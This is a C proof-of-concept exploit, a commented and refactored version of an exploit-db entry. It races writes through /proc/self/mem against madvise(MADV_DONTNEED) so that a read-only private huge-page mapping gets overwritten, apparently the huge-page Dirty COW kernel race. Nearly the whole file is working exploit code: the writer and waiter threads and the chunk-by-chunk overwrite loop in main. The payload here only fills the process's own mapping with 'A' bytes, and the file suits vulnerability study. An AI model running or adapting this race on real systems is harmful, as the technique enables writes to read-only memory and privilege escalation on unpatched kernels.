
/*
 * This code is a modified version of https://www.exploit-db.com/exploits/43199/
*/
#define _GNU_SOURCE

#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
/* Upper bound on write attempts per chunk before write_thread() gives up. */
#define TRIES_PER_PAGE (20000000)

/* Number of bytes of the mapping that the chunk loop in main() walks over. */
#define PAGE_SIZE (0x1000)

/* Byte value the payload is made of (0x41 == 'A'). Not referenced anywhere in
 * this file: wait_for_success() compares against the literal 'A' instead. */
#define MEMESET_VAL (0x41)

/* Size of the anonymous mapping (2 MiB). MADV_HUGEPAGE is requested on it in
 * main(); NOTE(review): presumably one huge page on the target arch - confirm. */
#define MAP_SIZE (0x200000)

/* Payload pushed into the mapping through /proc/self/mem: a run of 'A' bytes.
 * write_thread() uses sizeof(STRING), so the terminating NUL is written too. */
#define STRING "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

/* Length of STRING without its terminator; also the stride between chunks
 * (chunk n starts at chp + n*OFFSIZE). */
#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))
/* State shared between main() and the two race threads (one instance, passed
 * by pointer to both wait_for_success() and write_thread()). */
struct args{
/* Read/write descriptor on /proc/self/mem; every write into the mapping goes
 * through it, never through the (PROT_READ) mapping itself. */
int fd;
/* Base address of the MAP_SIZE anonymous mapping, as returned by mmap(). */
void *p;
/* Raised (set to 1) by wait_for_success() once the payload is visible, telling
 * write_thread() to stop retrying; main() clears it before each chunk.
 * NOTE(review): a plain int shared between two threads with no synchronization;
 * it works here because the syscalls in both loops force re-reads, but an
 * atomic type would make it well-defined. */
int stop;
/* Index of the chunk currently being attacked: target = chp + off*OFFSIZE. */
off_t off;
/* Same address as p, typed for byte arithmetic. */
char *chp;
};
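/*
 * Writer side of the race: repeatedly pushes STRING (including its NUL, via
 * sizeof) into the read-only mapping through /proc/self/mem, at the chunk
 * selected by arg->off.
 *
 * Each attempt is one pwrite(2) with the target address used directly as the
 * file offset, which is how /proc/<pid>/mem is addressed; this replaces the
 * lseek/write/lseek triple and leaves no file position to maintain. Return
 * values are deliberately ignored: a failed or short write is just one lost
 * attempt in the race.
 *
 * Stops after TRIES_PER_PAGE attempts or as soon as arg->stop is raised, and
 * raises arg->stop itself before returning so that a thread polling the flag
 * is not left waiting on a writer that has already given up.
 *
 * Returns NULL (pthread start-routine convention).
 */
void *write_thread(struct args *arg) {
    char *target = arg->chp + arg->off * OFFSIZE;
    /* Pointer -> integer goes through uintptr_t rather than a bare off_t cast. */
    off_t where = (off_t)(uintptr_t)target;

    for (int attempt = 0; attempt < TRIES_PER_PAGE && !arg->stop; attempt++) {
        (void)pwrite(arg->fd, STRING, sizeof(STRING), where);
    }

    /* Announce that we are done, whether we won or ran out of tries. */
    arg->stop = 1;
    return NULL;
}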
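/*
 * Waiter side of the race: spins until the first byte of the current chunk
 * reads back as the first byte of STRING - i.e. a write issued through
 * /proc/self/mem has landed in the private mapping - then raises arg->stop so
 * the writer quits.
 *
 * Between polls the whole mapping is discarded with MADV_DONTNEED so the next
 * access has to fault it in again, and sched_yield() hands the CPU over so the
 * writer gets its turn. madvise() failures are ignored on purpose: they only
 * mean no fresh page this round, and polling continues.
 *
 * Fixes relative to the original: the probe byte is read through a volatile
 * pointer, since it changes from outside this thread (the kernel writes it on
 * the writer's behalf); the comparison uses STRING[0] instead of a literal
 * 'A' so it tracks the payload; the unused madvise() result is gone; and the
 * loop also exits when arg->stop is raised by someone else, instead of
 * spinning forever when the race is never won.
 *
 * Returns NULL (pthread start-routine convention).
 */
void *wait_for_success(struct args *arg) {
    volatile const char *probe =
        (volatile const char *)(arg->chp + arg->off * OFFSIZE);

    while (*probe != STRING[0] && !arg->stop) {
        (void)madvise(arg->p, MAP_SIZE, MADV_DONTNEED);
        sched_yield();
    }

    arg->stop = 1;
    return NULL;
}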
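/*
 * Entry point: drives the race chunk by chunk across the first PAGE_SIZE bytes
 * of a read-only private mapping and finally prints what the mapping holds.
 *
 * Setup: a MAP_SIZE anonymous PROT_READ mapping (0x40000000 is only a hint -
 * no MAP_FIXED - so the real address is the one printed), MADV_HUGEPAGE
 * requested on it, and /proc/self/mem opened read/write; every write into the
 * mapping goes through that descriptor, never through the mapping itself.
 *
 * Per chunk: a waiter (wait_for_success) and a writer (write_thread) share one
 * struct args and are joined before the next chunk. After the join the target
 * byte is re-read, so a writer that exhausted TRIES_PER_PAGE is reported
 * rather than announced as "Done".
 *
 * Fixes relative to the original: a failed mmap() is fatal instead of being
 * used as the mapping base; a failed MADV_HUGEPAGE is reported; pthread_create()
 * errors are taken from its return value (it does not set errno, so perror()
 * was wrong) and checked per call rather than OR-ed together; the chunk loop
 * is bounded by PAGE_SIZE / OFFSIZE so the stride and the bound agree (the
 * old sizeof(STRING) bound stopped one chunk short of the page); the off_t
 * counter is cast before being printed with %x; the final dump is bounded to
 * PAGE_SIZE bytes because nothing guarantees a NUL in the mapping; and the
 * descriptor and mapping are released on the way out.
 *
 * Returns 0 on completion, 1 if the mapping, the descriptor or a thread could
 * not be created. On a thread-creation failure main returns without joining a
 * thread it already started; leaving main ends the process and with it that
 * thread.
 */
int main(void) {
    struct args arg;
    arg.off = 0;
    arg.stop = 0;

    arg.p = mmap((void *)0x40000000, MAP_SIZE, PROT_READ,
                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (arg.p == MAP_FAILED) {
        perror("[!] mmap()");
        return 1;
    }
    arg.chp = arg.p;
    printf("mmap address is %p\n", arg.p);

    /* Not fatal, but worth knowing: the PoC is aimed at the huge-page path. */
    if (madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE) != 0) {
        perror("[!] madvise(MADV_HUGEPAGE)");
    }

    arg.fd = open("/proc/self/mem", O_RDWR);
    if (arg.fd < 0) {
        perror("[!] open()");
        munmap(arg.p, MAP_SIZE);
        return 1;
    }

    /* PAGE_SIZE / OFFSIZE chunks of OFFSIZE bytes cover the whole first page. */
    while (arg.off < (off_t)(PAGE_SIZE / OFFSIZE)) {
        pthread_t waiter, writer;
        int rc;

        arg.stop = 0;

        /* pthread_create() returns the error number; errno is untouched. */
        rc = pthread_create(&waiter, NULL,
                            (void *(*)(void *))wait_for_success, &arg);
        if (rc != 0) {
            fprintf(stderr, "[!] pthread_create(): %s\n", strerror(rc));
            return 1;
        }
        rc = pthread_create(&writer, NULL,
                            (void *(*)(void *))write_thread, &arg);
        if (rc != 0) {
            fprintf(stderr, "[!] pthread_create(): %s\n", strerror(rc));
            return 1;
        }

        pthread_join(waiter, NULL);
        pthread_join(writer, NULL);

        /* Re-read the byte that was being attacked (volatile: the kernel wrote it). */
        if (*(volatile char *)(arg.chp + arg.off * OFFSIZE) == STRING[0]) {
            printf("[*] Done 0x%x String\n", (unsigned)arg.off);
        } else {
            printf("[!] Chunk 0x%x was not overwritten\n", (unsigned)arg.off);
        }
        arg.off++;
    }

    printf("[*] Overwrite a page\n");
    printf("%.*s\n", (int)PAGE_SIZE, arg.chp);

    close(arg.fd);
    munmap(arg.p, MAP_SIZE);
    return 0;
}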